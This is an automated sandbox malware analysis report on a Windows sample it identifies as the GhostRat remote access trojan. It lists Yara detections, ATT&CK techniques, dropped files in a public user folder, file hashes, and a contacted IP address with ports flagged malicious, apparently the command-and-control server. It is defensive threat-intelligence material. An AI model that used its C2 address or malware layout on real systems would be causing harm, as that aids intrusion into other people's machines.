Source: Yara match	File source: 3.3.Update.exe.482260b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.37f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.35b1053.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.36705bf.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.92667b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.32e1004.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.32e1004.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.35b1053.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Update.exe PID: 4348, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 3.3.Update.exe.482260b.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.36705bf.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.37f0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.482260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.92667b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.37f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.35b1053.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.36705bf.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.92667b.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.32e1004.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.32e1004.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.35b1053.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Update.exe PID: 4348, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	222 Process Injection	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	38 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	222 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Indicator Removal	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Uulw5M1DfU.exe	47%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Bilite\Axialis\Update.dll	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Bilite\Axialis\Update.exe	0%	ReversingLabs
C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\backup.dll	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\backup.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://go.microsofDSCResources55h	0%	Avira URL Cloud	safe
https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typ	0%	Avira URL Cloud	safe
https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepost	0%	Avira URL Cloud	safe
http://crl.microk	0%	Avira URL Cloud	safe
137.220.229.61:9092	0%	Avira URL Cloud	safe
137.220.229.61:9091	0%	Avira URL Cloud	safe
https://go.microsofD	0%	Avira URL Cloud	safe
http://www.ijg.org	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
137.220.229.61:9091	true	Avira URL Cloud: safe	unknown
137.220.229.61:9092	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ldapi.ldmnq.com/common/baidu/ocpcbaidu	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
https://sectigo.com/CPS0	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.microsofDSCResources55h	powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://middledata.ldmnq.com/collection/biz/uploadreport	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepost	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://middledata.ldmnq.com/collection/biz/upload	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.haxx.se/docs/http-cookies.html	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
https://res.ldmnq.com/ld/leidianexhttps://res.ldmnq.com/download/release/ldinst4.0.exehttps://res.ld	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
https://go.microsofD	powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microk	powershell.exe, 00000011.00000002.2573835228.0000000007100000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typ	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ldapi.ldmnq.com/common/baidu/ocpc	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ijg.org	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://ldapi.ldmnq.com/mnq/properties?openid=&packageName=https://encdn.ldmnq.com/player_files/open	Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
137.220.229.61	unknown	Singapore		64050	BCPL-SGBGPNETGlobalASNSG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584172
Start date and time:	2025-01-04 14:46:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Uulw5M1DfU.exe renamed because original name is a hash value
Original Sample Name:	F889FE126788FFBAFC2E0CD5E233FEE9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@43/29@0/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 160 Number of non-executed functions: 230
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1836 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4076 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BCPL-SGBGPNETGlobalASNSG	HGwpjJUqhW.exe	Get hash	malicious	GhostRat	Browse	118.107.44.219
	vYeaC4s9zP.exe	Get hash	malicious	GhostRat	Browse	27.124.4.60
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	BrSgiTp1iH.exe	Get hash	malicious	GhostRat	Browse	134.122.135.95
	http://smbc.usobd.com	Get hash	malicious	Unknown	Browse	134.122.128.92
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	118.107.44.219
	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse	27.124.34.140
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	202.79.169.178
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	143.92.60.116
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	118.107.45.13

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Bilite\Axialis\Update.exe	8R2YjBA8nI.exe	Get hash	malicious	GhostRat	Browse
	8R2YjBA8nI.exe	Get hash	malicious	Unknown	Browse
	6f0slJzOrF.exe	Get hash	malicious	GhostRat	Browse
	6f0slJzOrF.exe	Get hash	malicious	Unknown	Browse
	zPJUOck9wt.exe	Get hash	malicious	GhostRat	Browse
	zPJUOck9wt.exe	Get hash	malicious	Unknown	Browse
	MEuu1a2o6n.exe	Get hash	malicious	GhostRat	Browse
	MEuu1a2o6n.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\Public\Bilite\Axialis\IiViS

Download File

Process:	C:\Users\user\Desktop\Uulw5M1DfU.exe
File Type:	openssl enc'd data with salted password, base64 encoded
Category:	dropped
Size (bytes):	64
Entropy (8bit):	5.155639062229567
Encrypted:	false
SSDEEP:	3:iqkYKlSRHOVd9RWHLuupQrSKOyJYHn:ilYKIxOV1WHLTyXSn
MD5:	C430E4D79A2FF7DDBEDFBC4E82F44850
SHA1:	5C56C238993B933B055FA0844DBC7AF3BF125934
SHA-256:	80630814F682068AF61B891845CE55AF3602C4C70BF194FF44EF1438B8F59A8E
SHA-512:	A3E9476CD233B7ABD59113DCE57010D304A04EBF2A9BF530E1E162AD140AC100E62B78FCAE74B22E5D5338ECC075CC51F2C25482E03B8D21BAE38E2BD422B658
Malicious:	false
Preview:	U2FsdGVkX1/f/0v7A74sjSVk08xIvCoStpYVNnxIZCF0itaeIagm7/+XnylCkcSE

C:\Users\Public\Bilite\Axialis\Update.dll

Download File

Process:	C:\Users\user\Desktop\Uulw5M1DfU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	340760
Entropy (8bit):	6.543019915715004
Encrypted:	false
SSDEEP:	6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/jUaCcM:H66LUtNrIAzCKzRgDKrSeoUalM
MD5:	D8B8211D3CF9185D5C882AEF534CFA79
SHA1:	157FDE2C93A2A96726C49755C787E805EDE6E980
SHA-256:	A250C7CF1645BB2672DE489C1E1164EE0230703A6AC8E8AB8DE6D42E9EAC476C
SHA-512:	440E656B42997359CC32647564927AD8D0A65383E7340A7871B62FD87112A3A79C38D4409FA7DEB94C33B297895E522C1ACC9E8AAF7BCE96296CF99EA6F9EDAB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Bilite\Axialis\Update.exe

Download File

Process:	C:\Users\user\Desktop\Uulw5M1DfU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	395368
Entropy (8bit):	5.090673225697451
Encrypted:	false
SSDEEP:	6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
MD5:	FB325C945A08D06FE91681179BDCCC66
SHA1:	F5D91B7D75D34E156066AB4099E0FD0DF9227B32
SHA-256:	0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
SHA-512:	2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8R2YjBA8nI.exe, Detection: malicious, Browse Filename: 8R2YjBA8nI.exe, Detection: malicious, Browse Filename: 6f0slJzOrF.exe, Detection: malicious, Browse Filename: 6f0slJzOrF.exe, Detection: malicious, Browse Filename: zPJUOck9wt.exe, Detection: malicious, Browse Filename: zPJUOck9wt.exe, Detection: malicious, Browse Filename: MEuu1a2o6n.exe, Detection: malicious, Browse Filename: MEuu1a2o6n.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\Bilite\Axialis\ksqfwzmc.png

Download File

